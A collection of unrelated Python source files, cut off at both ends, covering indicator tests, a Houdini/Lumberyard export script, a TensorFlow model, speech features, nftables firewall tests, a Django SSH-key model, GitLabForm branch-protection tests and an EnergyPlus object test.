assert 000 == float(r.aroon_up)
assert +20 == float(r.aroon_down)
assert -20 == float(r.oscillator)
r = results[458]
assert 0000 == float(r.aroon_up)
assert +100 == float(r.aroon_down)
assert -100 == float(r.oscillator)
r = results[501]
assert +28 == float(r.aroon_up)
assert +88 == float(r.aroon_down)
assert -60 == float(r.oscillator)
def test_bad_data(self, bad_quotes):
r = indicators.get_aroon(bad_quotes, 20)
assert 502 == len(r)
def test_removed(self, quotes):
results = indicators.get_aroon(quotes, 25).remove_warmup_periods()
assert 502 - 25 == len(results)
last = results.pop()
assert +28 == float(last.aroon_up)
assert +88 == float(last.aroon_down)
assert -60 == float(last.oscillator)
def test_exceptions(self, quotes):
from System import ArgumentOutOfRangeException
with pytest.raises(ArgumentOutOfRangeException):
indicators.get_aroon(quotes, 0)
|
11547620
|
import unittest
import os
import json
from reporter_config.Config import Config, Parser
from reporter_config.actions.Drop import DropMsg
class RCDropTest(unittest.TestCase):
def setUp(self):
"""
Example message created by a conv function in a reporter
"""
with open(os.path.dirname(__file__) + '/rc_msg.json', 'r') as f:
self.msg = json.load(f)
def tearDown(self):
pass
def test_01_drop(self):
"""
Load drop.yaml configuration file, parse it and analyze it
"""
self.parser = Parser(os.path.dirname(__file__) + '/rc_config/drop.yaml');
self.config = Config(self.parser);
self.assertNotEqual(self.config, None)
self.config.match(self.msg)
|
11547650
|
import hou
from assetDB import AssetDBConnection
from slice import Slice
from fbxUtil import setScaleFactor
# import lib.perforce
from contextlib import closing
from jinja2 import Environment, FileSystemLoader, PackageLoader
from itertools import izip
import os
import random
import sys
# def getP4Connection():
# p4 = getP4Connection.p4
# if not p4.connected():
# try:
# p4.connect()
# except Exception as error:
# if 'check $P4PORT' in str(error):
# raise Exception('Not connected to network')
# return p4
# getP4Connection.p4 = lib.perforce.P4.P4()
# def isInP4(filepath):
# p4 = getP4Connection()
# try:
# info = p4.run('files', filepath.replace('\\', '/'))
# return info is not None
# except Exception as error:
# known_errors = [
# 'no such file',
# 'An empty string is not allowed as a file name',
# "is not under client's root"
# ]
# error_str = str(error)
# if any(error in error_str for error in known_errors):
# return False
# else:
# raise Exception(error)
# def checkOutFile(filepath):
# p4 = getP4Connection()
# inP4 = isInP4(filepath)
# if not inP4 and not os.path.exists(filepath):
# raise Exception('Critical Error: File - %s - does not exist on the local file system.' % filepath)
# if not inP4:
# p4.run('add', filepath)
# else:
# p4.run('edit', filepath)
class DestructibleSlice(Slice):
def __init__(self, blastAssetIdString, meshAssetIdStrings):
super(DestructibleSlice, self).__init__()
self.__blastFamilyGenericComponentWrapperId = str(random.randint(0, sys.maxsize))
self.__netSystemGenericComponentWrapperId = str(random.randint(0, sys.maxsize))
self.__locationComponentId = str(random.randint(0, sys.maxsize))
self.__blastFamilyComponentId = str(random.randint(0, sys.maxsize))
self.__blastMeshDataComponentId = str(random.randint(0, sys.maxsize))
self.__octreeNodeComponentId = str(random.randint(0, sys.maxsize))
self.__blastAssetIdString = blastAssetIdString
self.__meshAssetIdStrings = meshAssetIdStrings
@property
def blastFamilyGenericComponentWrapperId(self):
return self.__blastFamilyGenericComponentWrapperId
@property
def netSystemGenericComponentWrapperId(self):
return self.__netSystemGenericComponentWrapperId
@property
def locationComponentId(self):
return self.__locationComponentId
@property
def blastFamilyComponentId(self):
return self.__blastFamilyComponentId
@property
def blastMeshDataComponentId(self):
return self.__blastMeshDataComponentId
@property
def octreeNodeComponentId(self):
return self.__octreeNodeComponentId
@property
def blastAssetIdString(self):
return self.__blastAssetIdString
@property
def meshAssetIdStrings(self):
return self.__meshAssetIdStrings
def getChunkNames():
prefix = hou.pwd().parm('groupPrefix').eval()
renameNode = hou.node('{0}/HierarchyGroupToBlastChunkOrder'.format(hou.pwd().path()))
geo = renameNode.geometry()
primGroupNames = [group.name() for group in geo.primGroups()]
groupNames = [groupName for groupName in primGroupNames if groupName.startswith(prefix)]
if not groupNames:
raise Exception("No chunks found that start with {0}".format(prefix))
return groupNames
def getFBXFileNames():
chunkNames = getChunkNames()
objectName = hou.pwd().parm('objectName').eval()
return ["{0}_{1}".format(objectName, chunkName) for chunkName in chunkNames]
def getFBXFilePaths():
fileNames = getFBXFileNames()
outputDirectory = hou.pwd().parm('fbxOutputDirectory').eval()
if outputDirectory.endswith('/'):
outputDirectory = outputDirectory[:-1]
return ["{0}/{1}.fbx".format(outputDirectory, fileName) for fileName in fileNames]
# def checkOutAll():
# checkOutBlast()
# checkOutFBX()
# checkOutSlice()
# def checkOutBlast():
# file = hou.pwd().parm('blastOutputFile').eval()
# if file:
# checkOutFile(file)
# def checkOutFBX():
# files = getFBXFilePaths()
# for file in files:
# checkOutFile(file)
# def checkOutSlice():
# file = hou.pwd().parm('sliceOutputFile').eval()
# if file:
# checkOutFile(file)
def exportFBX():
chunkNames = getChunkNames()
fileNames = getFBXFileNames()
singleChunkName = hou.pwd().parm('singleChunkName')
singleChunkFile = hou.pwd().parm('singleChunkFile')
export = hou.pwd().parm('fbxExportSingleChunk')
restoreSingleChunkName = singleChunkName.unexpandedString()
restoreSingleChunkFile = singleChunkFile.unexpandedString()
for chunkName, fileName in izip(chunkNames, fileNames):
singleChunkName.set(chunkName)
singleChunkFile.set(fileName)
export.pressButton()
setScaleFactor(fileName)
singleChunkFile.set(restoreSingleChunkFile, follow_parm_reference=False)
singleChunkName.set(restoreSingleChunkName, follow_parm_reference=False)
def exportSlice():
# Path to the 'Assets' folder or similar
lumberyardAssetPath = hou.pwd().parm('lumberyardAssetPath').evalAsString().replace('\\', '/').lower()
if lumberyardAssetPath and lumberyardAssetPath[-1] != '/':
lumberyardAssetPath += '/'
# Path to the relative root of cached data e.g. 'pc/Assets/'
lumberyardCacheRelativeRoot = hou.pwd().parm('lumberyardCacheRelativeRoot').evalAsString().replace('\\', '/').lower()
if lumberyardCacheRelativeRoot and lumberyardCacheRelativeRoot[-1] != '/':
lumberyardCacheRelativeRoot += '/'
# Path to assetdb.sqlite for the project
lumberyardDatabasePath = hou.pwd().parm('lumberyardDatabasePath').evalAsString().replace('\\', '/').lower()
slicePath = hou.pwd().parm('sliceOutputFile').eval()
blastAssetPath = hou.pwd().parm('blastOutputFile').eval()
relativeBlastAssetPath = blastAssetPath.lower().replace(lumberyardAssetPath, '')
relativeCachedBlastAssetPath = '{0}{1}'.format(lumberyardCacheRelativeRoot, relativeBlastAssetPath)
fbxFilePaths = getFBXFilePaths()
relativeFbxPaths = [fbxPath.lower().replace(lumberyardAssetPath, '') for fbxPath in fbxFilePaths]
relativeCachedCgfPaths = [
'{0}{1}'.format(lumberyardCacheRelativeRoot, fbxPath.replace('.fbx', '.cgf'))
for fbxPath in relativeFbxPaths]
with AssetDBConnection(lumberyardDatabasePath) as assetDB:
blastAssetIdString = assetDB.getAssetId(relativeCachedBlastAssetPath, relativeBlastAssetPath)
meshAssetIdStrings = [
assetDB.getAssetId(cgfPath, fbxPath)
for fbxPath, cgfPath in izip(relativeFbxPaths, relativeCachedCgfPaths)]
jinjaEnv = Environment(loader=PackageLoader('blastExport', 'templates'), autoescape=True)
template = jinjaEnv.get_template('destructible_slice.xml')
destructibleSliceData = DestructibleSlice(blastAssetIdString, meshAssetIdStrings)
destructibleSliceData.name = hou.pwd().parm('objectName').eval()
with open(slicePath, 'w') as sliceFile:
sliceFile.write(template.render(destructibleSliceData))
def onCreated(node):
node.setColor(hou.Color((1.0, 0.6, 0.0)))
|
11547698
|
import sys
sys.path.append('../../pretrain')
# pretrain
from ops import max_pool2d,\
conv2d, fc_layer,\
get_shape
from augment_op import random_distort, random_crop, random_flip_rl, resize
import tensorflow as tf
slim = tf.contrib.slim
def conv1(x, is_training, reuse=False):
'''
Args:
x - 4D tensor [batch, 32, 32, 3]
is_training - bool tensor
reuse - bool
Return:
last, logits
last - 2D tensor
logits - 2D tensor
'''
r = tf.cond(
is_training,
lambda : random_flip_rl(
random_crop(
tf.pad(
x, [[0,0],[4,4],[4,4],[0,0]],
"CONSTANT"), 32, 32)),
lambda : x)
def leaky_relu_custom(alpha):
def func(features):
return tf.nn.leaky_relu(features, 1/alpha)
return func
with tf.variable_scope("NIN", reuse=reuse):
with slim.arg_scope([slim.conv2d], weights_initializer=tf.contrib.slim.variance_scaling_initializer(), weights_regularizer=slim.l2_regularizer(0.00004)):
with slim.arg_scope([slim.conv2d], stride=1, padding='SAME', activation_fn=leaky_relu_custom(5.5)):
with slim.arg_scope(([slim.dropout]), is_training=is_training, keep_prob=0.5):
n = r
n = slim.conv2d(n, 192, [5, 5], scope='conv2d_0')
n = slim.conv2d(n, 160, [1, 1], scope='conv2d_1')
n = slim.conv2d(n, 96, [1, 1], scope='conv2d_2')
n = slim.max_pool2d(n, [3,3], stride=2, padding='SAME')
n = slim.dropout(n)
n = slim.conv2d(n, 192, [5, 5], scope='conv2d_3')
n = slim.conv2d(n, 192, [1, 1], scope='conv2d_4')
n = slim.conv2d(n, 192, [1, 1], scope='conv2d_5')
n = slim.avg_pool2d(n, [3,3], stride=2, padding='SAME')
n = slim.dropout(n)
n = slim.conv2d(n, 192, [3, 3], scope='conv2d_6')
n = slim.conv2d(n, 192, [1, 1], activation_fn=None, scope='conv2d_7')
last = tf.reduce_mean(n, [1,2])
n = tf.nn.relu(n)
n = slim.conv2d(n, 100, [1,1], activation_fn=None, scope='conv2d_8')
logits = tf.reduce_mean(n, [1,2])
return last, logits
#=============================================================================================================================================#
CONV_DICT = {
'cifar':
{
'conv1' : conv1
},
'imgnet32':
{
'conv1' : conv1
},
'icml_cifar':
{
'conv1' : conv1
}
}
#=============================================================MANAGER====================================================================#
|
11547766
|
from typing import Callable
import numpy as np
from python_speech_features import mfcc, fbank, logfbank, ssc, delta
from neuralmonkey.readers.audio_reader import Audio
# pylint: disable=invalid-name
def SpeechFeaturesPreprocessor(feature_type: str = 'mfcc',
delta_order: int = 0,
delta_window: int = 2,
**kwargs) -> Callable:
"""Calculate speech features.
First, the given type of features (e.g. MFCC) is computed using a window
of length `winlen` and step `winstep`; for additional keyword arguments
(specific to each feature type), see
http://python-speech-features.readthedocs.io/. Then, delta features up to
`delta_order` are added.
By default, 13 MFCCs per frame are computed. To add delta and delta-delta
features (resulting in 39 coefficients per frame), set `delta_order=2`.
Arguments:
feature_type: mfcc, fbank, logfbank or ssc (default is mfcc)
delta_order: maximum order of the delta features (default is 0)
delta_window: window size for delta features (default is 2)
**kwargs: keyword arguments for the appropriate function from
python_speech_features
Returns:
A numpy array of shape [num_frames, num_features].
"""
if feature_type not in FEATURE_TYPES:
raise ValueError(
'Unknown speech feature type "{}"'.format(feature_type))
def preprocess(audio: Audio) -> np.ndarray:
features = [FEATURE_TYPES[feature_type](
audio.data, samplerate=audio.rate, **kwargs)]
for _ in range(delta_order):
features.append(delta(features[-1], delta_window))
return np.concatenate(features, axis=1)
return preprocess
def _fbank(*args, **kwargs) -> np.ndarray:
feat, _ = fbank(*args, **kwargs)
return feat
FEATURE_TYPES = {'mfcc': mfcc,
'fbank': _fbank,
'logfbank': logfbank,
'ssc': ssc}
|
11547767
|
import asyncio
import gta.utils
# The following metadata will not be processed but is recommended
# Author name and E-Mail
__author__ = '<NAME> <<EMAIL>>'
# Status of the script: Use one of 'Prototype', 'Development', 'Production'
__status__ = 'Development'
# The following metadata will be parsed and should always be provided
# Version number: This should always be a string and formatted in the x.x.x notation
__version__ = '0.0.1'
# A list of dependencies in the requirement specifiers format
# See: https://pip.pypa.io/en/latest/reference/pip_install.html#requirement-specifiers
__dependencies__ = ('aiohttp>=0.15.3',)
@asyncio.coroutine
def main():
"""
Does absolutely nothing but show you how to provide metadata.
"""
logger = gta.utils.get_logger('gta.metadata')
logger.debug('Hello from the metadata example')
|
11547786
|
import os
import subprocess
from time import sleep
from oeqa.oetest import oeRuntimeTest
class NftablesTest(oeRuntimeTest):
def check_ssh_connection(self):
'''Check SSH connection to DUT port 2222'''
process = subprocess.Popen(("ssh -o UserKnownHostsFile=/dev/null " \
"-o ConnectTimeout=3 " \
"-o StrictHostKeyChecking=no root@" + \
self.target.ip +" -p 2222 ls").split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output, err = process.communicate()
output = output.decode("utf-8")
returncode = process.returncode
return returncode, output
def add_test_table(self):
self.target.run("nft add table ip test")
self.target.run("nft add chain ip test input {type filter hook input priority 0\;}")
self.target.run("nft add chain ip test donothing")
self.target.run("nft add chain ip test prerouting {type nat hook prerouting priority 0 \;}")
self.target.run("nft add chain ip test postrouting {type nat hook postrouting priority 100 \;}")
def delete_test_table(self):
self.target.run("nft delete table ip test")
def test_reject(self):
'''Test rejecting SSH with nftables'''
self.add_test_table()
self.target.run("nft add rule ip test input tcp dport 2222 reject")
self.target.run("nft add rule ip test input goto donothing")
returncode, output = self.check_ssh_connection()
self.delete_test_table()
self.assertIn("Connection refused", output, msg="Error message: %s" % output)
def test_drop(self):
'''Test dropping SSH with nftables'''
self.add_test_table()
self.target.run("nft add rule ip test input tcp dport 2222 drop")
self.target.run("nft add rule ip test input goto donothing")
returncode, output = self.check_ssh_connection()
self.delete_test_table()
self.assertIn("Connection timed out", output, msg="Error message: %s" % output)
def test_redirect(self):
'''Test redirecting port'''
# Check that SSH can't connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertNotEqual(returncode, 0, msg="Error message: %s" % output)
self.add_test_table()
self.target.run("nft add rule ip test prerouting tcp dport 2222 redirect to 22")
# Check that SSH can connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertEqual(returncode, 0, msg="Error message: %s" % output)
self.delete_test_table()
# Check that SSH can't connect to port 2222
returncode, output = self.check_ssh_connection()
self.assertNotEqual(returncode, 0, msg="Error message: %s" % output)
|
11547794
|
from django.db import models
from core.models import AtmosphereUser
from uuid import uuid4
class SSHKey(models.Model):
name = models.CharField(max_length=256)
uuid = models.CharField(max_length=36, unique=True, default=uuid4)
pub_key = models.TextField()
atmo_user = models.ForeignKey(AtmosphereUser)
def __unicode__(self):
return "%s - %s Key:%s" %\
(self.atmo_user, self.name, self.pub_key)
@staticmethod
def keys_for_group(group):
"""
TODO: include leadership in the filter
"""
return SSHKey.objects.filter(atmo_user__memberships__group=group)
class Meta:
db_table = "ssh_key"
app_label = "core"
def get_user_ssh_keys(username):
user = AtmosphereUser.objects.get(username=username)
return SSHKey.objects.filter(atmo_user=user)
|
11547841
|
import faster_than_requests as requests
import time
import datetime
import urllib.request
print ("Faster")
start = datetime.datetime.now()
requests.get2str('http://localhost/sureflap-master/LockOutsite.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
start = datetime.datetime.now()
requests.get2str('http://localhost/sureflap-master/UnLock.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
print ("UrlLib")
start = datetime.datetime.now()
webUrl = urllib.request.urlopen('http://localhost/sureflap-master/LockOutsite.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
start = datetime.datetime.now()
webUrl = urllib.request.urlopen('http://localhost/sureflap-master/UnLock.php')
end = datetime.datetime.now()
time_taken = end - start
print('Time: ', time_taken)
|
11547852
|
import pytest
from gitlabform.gitlab import AccessLevel
from tests.acceptance import (
run_gitlabform,
DEFAULT_README,
get_gitlab,
get_random_name,
)
gl = get_gitlab()
class TestBranches:
def test__old_api(self, gitlab, group_and_project, branch):
protect_branch_but_allow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(protect_branch_but_allow_all, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
# @pytest.mark.skipif(
# gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
# )
# def test__code_owners_approval(self, gitlab, group_and_project, branch):
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, branch
# )
# assert branch_access_levels["code_owner_approval_required"] is False
#
# protect_branch_with_code_owner_approval_required = f"""
# projects_and_groups:
# {group_and_project}:
# branches:
# {branch}:
# protected: true
# developers_can_push: false
# developers_can_merge: true
# code_owner_approval_required: true
# """
#
# run_gitlabform(
# protect_branch_with_code_owner_approval_required, group_and_project
# )
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, branch
# )
# assert branch_access_levels["code_owner_approval_required"] is True
def test__old_api_other(self, gitlab, group_and_project, branch):
protect_branch_and_disallow_all = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: false
developers_can_merge: false
"""
run_gitlabform(protect_branch_and_disallow_all, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is False
assert the_branch["developers_can_merge"] is False
def test__mixed_old_and_new_api(
self,
gitlab,
group_and_project,
branch,
other_branch,
):
mixed_config_with_access_levels = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: false
developers_can_merge: true
{other_branch}:
protected: true
push_access_level: {AccessLevel.DEVELOPER.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(mixed_config_with_access_levels, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is False
assert the_branch["developers_can_merge"] is True
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, other_branch)
assert push_access_levels == [AccessLevel.DEVELOPER.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
@pytest.mark.skipif(
gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
)
def test__allow_user_ids(
self,
gitlab,
group_and_project,
branch,
make_user,
):
user_allowed_to_push = make_user(AccessLevel.DEVELOPER)
user_allowed_to_merge = make_user(AccessLevel.DEVELOPER)
user_allowed_to_push_and_merge = make_user(AccessLevel.DEVELOPER)
config_with_user_ids = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
allowed_to_push:
- user_id: {user_allowed_to_push.id}
- access_level: {AccessLevel.NO_ACCESS.value}
- user: {user_allowed_to_push_and_merge.name}
allowed_to_merge:
- access_level: {AccessLevel.DEVELOPER.value}
- user_id: {user_allowed_to_merge.id}
- user: {user_allowed_to_push_and_merge.name}
"""
run_gitlabform(config_with_user_ids, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
_,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == sorted(
[
user_allowed_to_push.id,
user_allowed_to_push_and_merge.id,
]
)
assert merge_access_user_ids == sorted(
[
user_allowed_to_merge.id,
user_allowed_to_push_and_merge.id,
]
)
@pytest.mark.skipif(
gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
)
def test__allow_more_than_one_user_by_ids(
self,
gitlab,
group_and_project,
branch,
make_user,
):
first_user = make_user(AccessLevel.DEVELOPER)
second_user = make_user(AccessLevel.DEVELOPER)
third_user = make_user(AccessLevel.DEVELOPER)
config_with_more_user_ids = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
allowed_to_push:
- access_level: {AccessLevel.MAINTAINER.value}
- user_id: {first_user.id}
- user_id: {second_user.id}
- user: {third_user.name}
allowed_to_merge:
- access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_with_more_user_ids, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
_,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.MAINTAINER.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == sorted(
[
first_user.id,
second_user.id,
third_user.id,
]
)
assert merge_access_user_ids == []
def test__old_api_then_new_api_and_unprotect(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
config_protect_branch_unprotect = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
"""
run_gitlabform(config_protect_branch_unprotect, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__new_api_then_old_api_and_unprotect(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_protect_branch_unprotect = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
"""
run_gitlabform(config_protect_branch_unprotect, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__unprotect_when_the_rest_of_the_parameters_are_still_specified_old_api(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_protect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is True
assert the_branch["developers_can_push"] is True
assert the_branch["developers_can_merge"] is True
config_unprotect_branch_with_old_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
developers_can_push: true
developers_can_merge: true
"""
run_gitlabform(config_unprotect_branch_with_old_api, group_and_project)
the_branch = gitlab.get_branch(group_and_project, branch)
assert the_branch["protected"] is False
def test__unprotect_when_the_rest_of_the_parameters_are_still_specified_new_api(
self, gitlab, group_and_project, branch
):
config_protect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_protect_branch_with_new_api, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels == [AccessLevel.NO_ACCESS.value]
assert merge_access_levels == [AccessLevel.MAINTAINER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
config_unprotect_branch_with_new_api = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: false
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.MAINTAINER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(config_unprotect_branch_with_new_api, group_and_project)
# old API
branch = gitlab.get_branch(group_and_project, branch)
assert branch["protected"] is False
# new API
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_levels is None
assert merge_access_levels is None
assert push_access_user_ids is None
assert merge_access_user_ids is None
assert unprotect_access_level is None
def test__config_with_access_level_names(self, gitlab, group_and_project, branch):
config_with_access_levels_names = f"""
projects_and_groups:
{group_and_project}:
branches:
{branch}:
protected: true
push_access_level: no_access # note "_" or " " and the various
merge_access_level: Developer # case in each line. it should not
unprotect_access_level: MAINTAINER # matter as we allow any case.
"""
run_gitlabform(config_with_access_levels_names, group_and_project)
(
push_access_level,
merge_access_level,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(group_and_project, branch)
assert push_access_level == [AccessLevel.NO_ACCESS.value]
assert merge_access_level == [AccessLevel.DEVELOPER.value]
assert push_access_user_ids == []
assert merge_access_user_ids == []
assert unprotect_access_level is AccessLevel.MAINTAINER.value
|
11547866
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.coils import CoilHeatingDxMultiSpeed
log = logging.getLogger(__name__)
class TestCoilHeatingDxMultiSpeed(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_coilheatingdxmultispeed(self):
pyidf.validation_level = ValidationLevel.error
obj = CoilHeatingDxMultiSpeed()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
obj.availability_schedule_name = var_availability_schedule_name
# node
var_air_inlet_node_name = "node|Air Inlet Node Name"
obj.air_inlet_node_name = var_air_inlet_node_name
# node
var_air_outlet_node_name = "node|Air Outlet Node Name"
obj.air_outlet_node_name = var_air_outlet_node_name
# real
var_minimum_outdoor_drybulb_temperature_for_compressor_operation = 5.5
obj.minimum_outdoor_drybulb_temperature_for_compressor_operation = var_minimum_outdoor_drybulb_temperature_for_compressor_operation
# real
var_outdoor_drybulb_temperature_to_turn_on_compressor = 6.6
obj.outdoor_drybulb_temperature_to_turn_on_compressor = var_outdoor_drybulb_temperature_to_turn_on_compressor
# real
var_crankcase_heater_capacity = 0.0
obj.crankcase_heater_capacity = var_crankcase_heater_capacity
# real
var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation = 0.0
obj.maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation = var_maximum_outdoor_drybulb_temperature_for_crankcase_heater_operation
# object-list
var_defrost_energy_input_ratio_function_of_temperature_curve_name = "object-list|Defrost Energy Input Ratio Function of Temperature Curve Name"
obj.defrost_energy_input_ratio_function_of_temperature_curve_name = var_defrost_energy_input_ratio_function_of_temperature_curve_name
# real
var_maximum_outdoor_drybulb_temperature_for_defrost_operation = 3.61
obj.maximum_outdoor_drybulb_temperature_for_defrost_operation = var_maximum_outdoor_drybulb_temperature_for_defrost_operation
# alpha
var_defrost_strategy = "ReverseCycle"
obj.defrost_strategy = var_defrost_strategy
# alpha
var_defrost_control = "Timed"
obj.defrost_control = var_defrost_control
# real
var_defrost_time_period_fraction = 0.0
obj.defrost_time_period_fraction = var_defrost_time_period_fraction
# real
var_resistive_defrost_heater_capacity = 0.0
obj.resistive_defrost_heater_capacity = var_resistive_defrost_heater_capacity
# alpha
var_apply_part_load_fraction_to_speeds_greater_than_1 = "Yes"
obj.apply_part_load_fraction_to_speeds_greater_than_1 = var_apply_part_load_fraction_to_speeds_greater_than_1
# alpha
var_fuel_type = "Electricity"
obj.fuel_type = var_fuel_type
# integer
var_region_number_for_calculating_hspf = 3
obj.region_number_for_calculating_hspf = var_region_number_for_calculating_hspf
# integer
var_number_of_speeds = 3
obj.number_of_speeds = var_number_of_speeds
# real
var_speed_1_gross_rated_heating_capacity = 0.0001
obj.speed_1_gross_rated_heating_capacity = var_speed_1_gross_rated_heating_capacity
# real
var_speed_1_gross_rated_heating_cop = 0.0001
obj.speed_1_gross_rated_heating_cop = var_speed_1_gross_rated_heating_cop
# real
var_speed_1_rated_air_flow_rate = 0.0001
obj.speed_1_rated_air_flow_rate = var_speed_1_rated_air_flow_rate
# real
var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate = 625.0
obj.speed_1_rated_supply_air_fan_power_per_volume_flow_rate = var_speed_1_rated_supply_air_fan_power_per_volume_flow_rate
# object-list
var_speed_1_heating_capacity_function_of_temperature_curve_name = "object-list|Speed 1 Heating Capacity Function of Temperature Curve Name"
obj.speed_1_heating_capacity_function_of_temperature_curve_name = var_speed_1_heating_capacity_function_of_temperature_curve_name
# object-list
var_speed_1_heating_capacity_function_of_flow_fraction_curve_name = "object-list|Speed 1 Heating Capacity Function of Flow Fraction Curve Name"
obj.speed_1_heating_capacity_function_of_flow_fraction_curve_name = var_speed_1_heating_capacity_function_of_flow_fraction_curve_name
# object-list
